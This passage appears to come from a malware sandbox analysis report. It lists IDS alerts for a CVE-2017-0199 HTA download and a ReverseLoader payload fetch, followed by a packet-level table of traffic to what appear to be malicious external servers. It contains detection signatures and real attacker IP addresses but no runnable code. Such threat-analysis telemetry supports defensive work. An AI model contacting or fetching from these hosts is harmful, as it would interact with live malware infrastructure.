2024-11-20T07:49:58.566915+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49162	192.3.22.13	80	TCP
2024-11-20T07:49:58.566918+0100	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	192.3.22.13	80	192.168.2.22	49162	TCP
2024-11-20T07:50:01.056934+0100	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49164	192.3.22.13	80	TCP
2024-11-20T07:50:01.056946+0100	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	192.3.22.13	80	192.168.2.22	49164	TCP
2024-11-20T07:50:09.525871+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.22	49165	192.3.22.13	80	TCP
2024-11-20T07:50:18.322154+0100	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	142.215.209.78	443	192.168.2.22	49166	TCP
2024-11-20T07:50:32.630460+0100	2858796	ETPRO MALWARE ReverseLoader Payload Request (GET) M1	1	192.168.2.22	49167	192.3.22.13	80	TCP
2024-11-20T07:50:32.818164+0100	2020423	ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound	1	192.3.22.13	80	192.168.2.22	49167	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2024 07:49:57.066409111 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.066454887 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.066668034 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.072799921 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.072813988 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.699599028 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.699708939 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.704891920 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.704902887 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.705382109 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.705436945 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.785248041 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.827322960 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.964924097 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.965055943 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.965065956 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.965102911 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.965106964 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.965156078 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.966427088 CET	49161	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:57.966438055 CET	443	49161	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:57.977897882 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:57.982882023 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:57.983006001 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:57.983184099 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:57.988018036 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.566751003 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.566792965 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.566848993 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.566884041 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.566915035 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.566917896 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.566950083 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.566952944 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.566987038 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.567002058 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.567020893 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.567038059 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.567054033 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.567078114 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.567087889 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.567127943 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.567181110 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.572066069 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.572101116 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.572135925 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.572135925 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.572149038 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.572190046 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.573889017 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.654496908 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654539108 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654575109 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654606104 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.654611111 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654620886 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.654664040 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.654684067 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654731035 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.654743910 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654793024 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654829979 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654864073 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.654890060 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.654912949 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.655581951 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.655633926 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.655647993 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.655668974 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.655683994 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.655702114 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.655719042 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.655736923 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.655750036 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.655792952 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.656482935 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.656532049 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.656541109 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.656565905 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.656583071 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.656599045 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.656615019 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.656634092 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.656637907 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.656677961 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.657283068 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.657315969 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.657342911 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.657351017 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.657363892 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.657407045 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.698199987 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.698312044 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.698374987 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.698436022 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742146015 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742202044 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742230892 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742232084 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742261887 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742286921 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742297888 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742321014 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742336035 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742383003 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742408037 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742461920 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742464066 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742513895 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742518902 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742547989 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742569923 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742582083 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742608070 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742616892 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.742639065 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.742669106 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.743266106 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.743299007 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.743334055 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.743352890 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.743355989 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.743386984 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.743412018 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.743422031 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.743443966 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.743454933 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.743474007 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.743490934 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.743505955 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.743550062 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.744107962 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.744167089 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.744218111 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.744251013 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.744272947 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.744283915 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.744307995 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.744317055 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.744338036 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.744350910 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.744376898 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.744385958 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.744396925 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.744434118 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.744966984 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.745018005 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.745032072 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.745054960 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.745080948 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.745110989 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.745112896 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.745146036 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.745172977 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.745179892 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.745207071 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.745232105 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.745234013 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.745296001 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.763900995 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.763955116 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.763994932 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.764009953 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.764025927 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.764045000 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.764070988 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.764076948 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.764106989 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.764112949 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.764161110 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.764183998 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:58.978585005 CET	80	49162	192.3.22.13	192.168.2.22
Nov 20, 2024 07:49:58.978677034 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:59.296303988 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:59.296353102 CET	49162	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:49:59.317061901 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:59.317085981 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:49:59.317161083 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:59.379909039 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:49:59.379924059 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:50:00.002753019 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:50:00.002865076 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:50:00.009618998 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:50:00.009629965 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:50:00.010016918 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:50:00.010082006 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:50:00.223227024 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:50:00.267334938 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:50:00.399543047 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:50:00.399739027 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:50:00.399840117 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:50:00.420949936 CET	49163	443	192.168.2.22	198.244.140.41
Nov 20, 2024 07:50:00.420980930 CET	443	49163	198.244.140.41	192.168.2.22
Nov 20, 2024 07:50:00.443130016 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:00.448378086 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:00.453519106 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:00.528765917 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:00.535007954 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056802034 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056818008 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056828976 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056885958 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056898117 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056909084 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056921005 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056932926 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056934118 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.056946039 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056958914 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.056981087 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.057013988 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.061971903 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.062129021 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.062191963 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.149183989 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.149205923 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.149216890 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.149458885 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.149471045 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.149482012 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.149493933 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.149507046 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.149755955 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.150347948 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.150360107 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.150372028 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.150403976 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.150417089 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.150434971 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.150466919 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.151249886 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.151293993 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.151305914 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.151323080 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.151345968 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.151357889 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.151365995 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.151398897 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.152210951 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.152224064 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.152235985 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.152247906 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.152297020 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.191924095 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.241668940 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.241749048 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.241775036 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.241805077 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.241816044 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.241851091 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.241873980 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.241884947 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.241892099 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.241920948 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.241928101 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.241954088 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.241966009 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.241992950 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242172956 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.242204905 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.242221117 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242238998 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.242263079 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242284060 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242543936 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.242578030 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.242597103 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242610931 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.242633104 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242644072 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.242659092 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242675066 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242871046 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.242918015 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.242969990 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.243021965 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.243026972 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.243055105 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.243061066 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.243088961 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.243105888 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.243124008 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.243134975 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.243168116 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.243174076 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.243220091 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.243871927 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.243907928 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.243933916 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.243952036 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.243977070 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244021893 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244040012 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244075060 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244102955 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244107008 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244122028 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244149923 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244165897 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244196892 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244779110 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244812012 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244827032 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244847059 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244847059 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244890928 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244891882 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244926929 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244940042 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244961023 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.244976044 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.244997025 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.245002031 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.245043039 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.245624065 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.245675087 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.245692968 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.245735884 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.252899885 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.252958059 CET	80	49164	192.3.22.13	192.168.2.22
Nov 20, 2024 07:50:01.252964973 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.252990961 CET	49164	80	192.168.2.22	192.3.22.13
Nov 20, 2024 07:50:01.252990961 CET	80	49164	192.3.22.13	192.168.2.22
